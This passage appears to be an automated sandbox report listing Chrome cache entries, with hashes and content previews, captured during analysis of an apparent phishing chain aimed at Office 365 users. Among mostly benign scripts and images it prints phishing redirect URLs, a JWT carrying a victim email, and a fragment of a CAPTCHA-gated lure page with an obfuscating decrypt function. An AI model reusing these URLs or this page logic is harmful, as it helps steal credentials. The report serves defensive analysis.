                                                            SHA-512:D1A8015658A82AE64F2E93341B8CA15B0057DF298DF36ACB47188B330E0327CFE0392EE1FF94B9D3BE7BC7D689BDD536A86ADB873A7ADEDE10AE45AA9A9415DB
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js
                                                            Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function fr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                            Chrome Cache Entry: 181

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                            Category:dropped
                                                            Size (bytes):17174
                                                            Entropy (8bit):2.9129715116732746
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                            Chrome Cache Entry: 183

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 342 x 72, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):5139
                                                            Entropy (8bit):7.865234009830226
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:8B36337037CFF88C3DF203BB73D58E41
                                                            SHA1:1ADA36FA207B8B96B2A5F55078BFE2A97ACEAD0E
                                                            SHA-256:E4E1E65871749D18AEA150643C07E0AAB2057DA057C6C57EC1C3C43580E1C898
                                                            SHA-512:97D8CC97C4577631D8D58C0D9276EE55E4B80128080220F77E01E45385C20FE55D208122A8DFA5DADCB87543B1BC291B98DBBA44E8A2BA90D17C638C15D48793
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:.PNG........IHDR...V...H.............tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:DB120779422011EA9888910153D3A5E6" xmpMM:DocumentID="xmp.did:DB12077A422011EA9888910153D3A5E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DB120777422011EA9888910153D3A5E6" stRef:documentID="xmp.did:DB120778422011EA9888910153D3A5E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>P.WI....IDATx..]]l.......(.5.K0P..0...E.qT..J X)F.(5X....J.}(m.R5.Q...RUEUPU~.....qp@.b......L...k.m"0......"c.3

                                                            Chrome Cache Entry: 184

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.241202481433726
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                            Chrome Cache Entry: 187

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):337
                                                            Entropy (8bit):5.851405123083318
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:551ABA087A8ED476761DA8E56A4E5457
                                                            SHA1:4B8219B32B9C03D6F2C98CA153449AD0BFABF9D2
                                                            SHA-256:95688EB14AF34A74AD14AD660150693524CFB725A4C8BAA9D3644FC87376D082
                                                            SHA-512:5C78B2491BFCDAB7718FB14FFE704E2C0F965D5C164A70D151007A2998CAE692EFB6FD4DDD974F7BC9A82A6057CD0A8E9B4B6E5EEC33769FC61229DF6AFCECBA
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://doitace.com/?jnzqiymt&qrc=trumpsucksdick@mail.ru
                                                            Preview:{"url":"https://happylifedon.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcHB5bGlmZWRvbi5jb20vIiwiZG9tYWluIjoiaGFwcHlsaWZlZG9uLmNvbSIsImtleSI6Ikh6M0s5eXEyWnlTdiIsInFyYyI6InRydW1wc3Vja3NkaWNrQG1haWwucnUiLCJpYXQiOjE3MjAwMjE3NjEsImV4cCI6MTcyMDAyMTg4MX0.tbRjSToZbNOK7RKrcJFHPtx0R2BS-No0DSZa8gLtR2s","frame":true}

                                                            Chrome Cache Entry: 189

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (1899)
                                                            Category:downloaded
                                                            Size (bytes):5768
                                                            Entropy (8bit):5.371407082879717
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5EE1C89BE946DCCCA92D2B6B77429FC1
                                                            SHA1:806CAAD498989DB27A814C8E30A134C93CC063A2
                                                            SHA-256:168995D05A7AB0435BF2536684E4CC809983F6A360A5959DFEBE03C49F042DE8
                                                            SHA-512:BE0A24852B14B684679B8D50D0C652F5AA0F0B2110FD3D2EF58C4A227111ABC9D103C5A2B09A1DEC7C144BD14049D1C75AC34C8CB547A8CC5430D5E1AEC09CFD
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/?email=trumpsucksdick@mail.ru
                                                            Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAAdVmX4Y8IG49PoL", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -

                                                            Chrome Cache Entry: 190

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (59783), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):663451
                                                            Entropy (8bit):5.3635307555313165
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:761CE9E68C8D14F49B8BF1A0257B69D6
                                                            SHA1:8CF5D714D35EFFA54F3686065CB62CCE028E2C77
                                                            SHA-256:BEAA65AD34340E61E9E701458E2CCFF8F9073FDEBBC3593A2C7EC8AFEACB69C1
                                                            SHA-512:CEC948666FBA0F56D3DA27A931033C3A581C9C00FEC4D3DDCF41324525B5B5321AE3AB89581ECC7F497DE85EF684AB277C8A2DB393D526416CEB76C91A1B9263
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/scripts/boot.worldwide.0.mouse.js
                                                            Preview:.window.scriptsLoaded = window.scriptsLoaded || {}; window.scriptProcessStart = window.scriptProcessStart || {}; window.scriptProcessStart['boot.worldwide.0.mouse.js'] = (new Date()).getTime();../* Empty file */;Function.__typeName="Function";Function.__class=!0;Function.createCallback=function(n,t){return function(){var r=arguments.length;if(r>0){for(var u=[],i=0;i<r;i++)u[i]=arguments[i];u[r]=t;return n.apply(this,u)}return n.call(this,t)}};Function.prototype.bind=Function.prototype.bind||function(n){if(typeof this!="function")throw new TypeError("bind(): we can only bind to functions");var u=Array.prototype.slice.call(arguments,1),r=this,t=function(){},i=function(){return r.apply(this instanceof t?this:n,u.concat(Array.prototype.slice.call(arguments)))};this.prototype&&(t.prototype=this.prototype);i.prototype=new t;return i};Function.createDelegate=function(n,t){return function(){return t.apply(n,arguments)}};Function.emptyFunction=Function.emptyMethod=function(){};Error.__typeNam

                                                            Chrome Cache Entry: 192

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65339), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):660449
                                                            Entropy (8bit):5.4121922690110535
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D9E3D2CE0228D2A5079478AAE5759698
                                                            SHA1:412F45951C6AEDA5F3DF2C52533171FC7BDD5961
                                                            SHA-256:7041D585609800051E4F451792AEC2B8BD06A4F2D29ED6F5AD8841AAE5107502
                                                            SHA-512:06700C65BEF4002EBFBFF9D856C12E8D71F408BACA2D2103DDE1C28319B6BD3859FA9D289D8AEB6DD484E802040F6EE537F31F97B4B60A6B120A6882C992207A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/scripts/boot.worldwide.3.mouse.js
                                                            Preview:.window.scriptsLoaded = window.scriptsLoaded || {}; window.scriptProcessStart = window.scriptProcessStart || {}; window.scriptProcessStart['boot.worldwide.3.mouse.js'] = (new Date()).getTime();..;_n.a.jR=function(n){return n.dS()};_n.a.jZ=function(n){return n.eh()};_n.a.jP=function(n){return n.cC()};_n.a.jQ=function(n){return n.ca()};_n.a.hZ=function(n){return n.dO};_n.a.jU=function(n){return n.ed()};_n.a.jT=function(n){return n.ea()};_n.a.kb=function(n){return n.ej()};_n.a.hM=function(n){return 300};_n.a.fh=function(n){return n.V};_n.a.jV=function(n){return n.bI()};_n.a.ie=function(n){return n.mh()};_n.a.km=function(n){return n.bl()};_n.a.ka=function(n){return n.ei()};_n.a.ko=function(n){return n.cV()};_n.a.eX=function(n){return _y.E.isInstanceOfType(n)?n.y:null};_n.a.jN=function(n){return n.c()};_n.a.gm=function(n){return n.b()};_n.a.jM=function(n){return n.b()};_n.a.ib=function(n){return n.jM()};_n.a.iq=function(n){return n.bG};_n.a.iX=function(n){return _n.V.isInstanceOfType(n)?n

                                                            Chrome Cache Entry: 193

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):3651
                                                            Entropy (8bit):4.094801914706141
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

                                                            Static File Info

                                                            No static file info